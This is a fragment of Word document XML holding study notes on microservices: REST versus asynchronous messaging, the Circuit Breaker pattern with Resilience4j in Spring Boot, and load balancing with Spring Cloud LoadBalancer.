      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="710"/>
    </w:p>
    <w:p w14:paraId="3011266C" w14:textId="74C2186C" w:rsidR="00105186" w:rsidRPr="00CE4B95"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Synchronous Communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088B2D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4D72A001"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widely adopted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41712290"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bug and test (Postman, curl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47C887"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hen immediate response is needed (e.g., GET /orders/1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4B131"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586E8FF2"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 if Service B is down, Service A fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24952D61"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reased latency with chained service calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA9C63"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scale under heavy load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E33A4"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955" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="492004D4"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essaging (Asynchronous Communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66025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61C70A06"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 coupling: services don’t need to know each other’s availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD88503"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calability and throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C738F18"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at for event-driven architecture (e.g., “OrderPlaced” event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68455EB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48505C64"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set up and monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5391A"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 (response is not immediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C6CF1"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trace/debug (needs distributed tracing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C32DE"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956" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="760835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CE4B95" w14:paraId="491DF805" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3408D52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ssaging (Kafka, RabbitMQ)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="5909B57C" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DC0AC5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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="2C38A2A6" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="648435A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r>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="43C62B41" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C4837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er and receiver can be decoupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="4CE1CC54" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2476485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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="3412E18B" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D68809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reliable (can retry, durable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="6EB6B8F1" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53636D0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ly scalable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="6B2FC257" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E1E365"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delayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="283E34BE" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223F85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retry, dead-letter queues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="36E5AF9D" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757A170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ground jobs, event notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="248EE231"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957" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18884892"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3F54C98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REST when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C50F20"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sponse is required (e.g., Login, Search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1FD7D"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integration with frontends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C68D76"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fits a client-server pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DB4AC"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Messaging when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478E4EE"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decoupled, event-driven architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF34C02"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volume of traffic or batching is expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CE469"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958" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A837B98"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ybrid Approach (Best Practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11293BD5"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st production-grade microservice systems use both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E90409"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REST for synchronous, real-time operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867ED39" w14:textId="6C35A7C1"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essaging/event streams for decoupled, asynchronous workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36046E3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303F00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rder Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291CB036"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POST /order → creates order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0D5C4"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 publishes OrderCreated to Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135AB5A"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12FB6BCC"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updates stock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52632B4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ification Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F34A7"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sends email/SMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813D4EB"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959" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A19DFB" w14:textId="6825F0AB" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E121E6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="711" w:name="_Toc197867925"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Circuit Breaker pattern and its implementation using Resilience4j?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="711"/>
    </w:p>
    <w:p w14:paraId="67365D1B" w14:textId="06F1CB90"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Pattern in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005784D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960" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00845FB2"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ircuit Breaker?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157F199"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latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057958A8"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urce exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4ACE65"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scading failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDCB65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961" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="151774DC" w14:textId="797FB192"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States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638833F8" w14:textId="2272317E"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962" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63B466"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lience4j Implementation in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C84DF"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eatures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF5CA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rcuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698150B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er</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21039B6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ry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EC85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lkhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07A0D9"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Limiter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B25B02"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e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE619F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Circuit Breaker using Resilience4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EF485" w14:textId="219EE39A"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3C3EA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Dependency (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290DDE3"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spring-boot3:2.1.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E4EA3" w14:textId="47DB44AA"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op'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA497A"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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4AC27"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3C0D3114"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io.github.resilience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120AF18"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resilience4j-spring-boot3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA1BF6"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2.1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C2A75" w14:textId="701535EB"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47BC9FEC"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Sample Service Layer with Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE19E9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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8D5FA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BFD1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49F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ServiceC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llback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GetProducts"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16297BA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A66B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failure or call external service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2CC7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2B29E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rvice is down!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F45F7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00089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pto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h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blet"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55FFF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882D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D128B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lback method must have same signature + Throwable parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1297A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allbackGetProduc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149A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llback Product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 Product 2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7483269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E2C5F0" w14:textId="0D315A1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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76745E5F"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963" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69555214" w14:textId="41AD4930"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pplication Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24F967"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resilience4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CB</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180AE12"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slidingWindow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p>
    <w:p w14:paraId="50A2D79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minimumNumberOfCal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p>
    <w:p w14:paraId="1235505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failureRateThresh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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256D718"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waitDurationIn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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788678E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permittedNumberOfCallsInHalf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52C31B7A" w14:textId="6C86CA1C"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automaticTransitionFromOpenToHalfOpen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E9F83E6"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964" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893E193" w14:textId="28F54392"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ontroller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022706D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2E3E7A0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products"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDBB45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A3142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8D0C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637DDCA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productService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E879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4CC4B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p>
    <w:p w14:paraId="13243FD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B1988E"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Products</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836790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EAA2F" w14:textId="7466AA94"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AB820A" w14:textId="47BC5901" w:rsidR="0020778D" w:rsidRPr="00CE4B95" w:rsidRDefault="0020778D" w:rsidP="0020778D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A883D0"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ese to monitor circuit breaker metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39319CF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ctuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60B821"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micrometer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09009D02" w14:textId="1A85598D"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micrometer:micrometer-registry-prometheus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA7066"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CE4B95" w14:paraId="73812D16" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB5B7ED"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0778D" w:rsidRPr="00CE4B95" w14:paraId="665E224F" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DAB9AB4"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ps calling a failed service until it recovers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="47D1B08B" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4457133B"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lback immediately instead of waiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="0FD05FEA" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="526E97D1"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s get default or cached response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020778D" w:rsidRPr="00CE4B95" w14:paraId="204BC98C" w14:textId="77777777" w:rsidTr="0020778D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47FC41C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failure rates and transition states</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B9EB41E" w14:textId="4EADB7BA" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00051071">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="712" w:name="_Toc197867926"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Load balancing in microservices using Spring Cloud Load Balancer</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="712"/>
    </w:p>
    <w:p w14:paraId="0270BE8A" w14:textId="1F190A9C"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Load Balancing in Microservices?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA762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965" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="579101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Cloud LoadBalancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB619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966" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF09037"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tup and Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD99A52"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19021DD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Spring Boot app, include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9AE60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build.gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577854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loadbalancer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2D976" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E4432F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make sure you have service discovery (e.g., Eureka):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21953FA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nable Discovery Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FAF5A"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4C16CAF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EnableDiscoveryClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21753335"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A4B0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5E008C"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3447D7F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E9E79C" w14:textId="1EEE619A"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EF04D"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ject LoadBalanced RestTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062EB86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4965DD0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DD2E8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4FF5B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11918E0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LoadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1802464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F2AA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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23EAC3"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07E04A" w14:textId="1340386B"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44A87C"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 Another Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD55D5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676BCC64"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8D123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175F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0B1678D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p>
    <w:p w14:paraId="7826A53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9D62BB"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get-data"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E196D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64C07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or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user-service/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A39B4C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12D9452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90C08" w14:textId="2BA72F2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1259E0" w14:textId="2862C2BC" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120EBB6C"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Pr="00CE4B95" w:rsidRDefault="004B1E96" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73614AA3" w14:textId="77777777" w:rsidR="004B1E96" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1E96" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
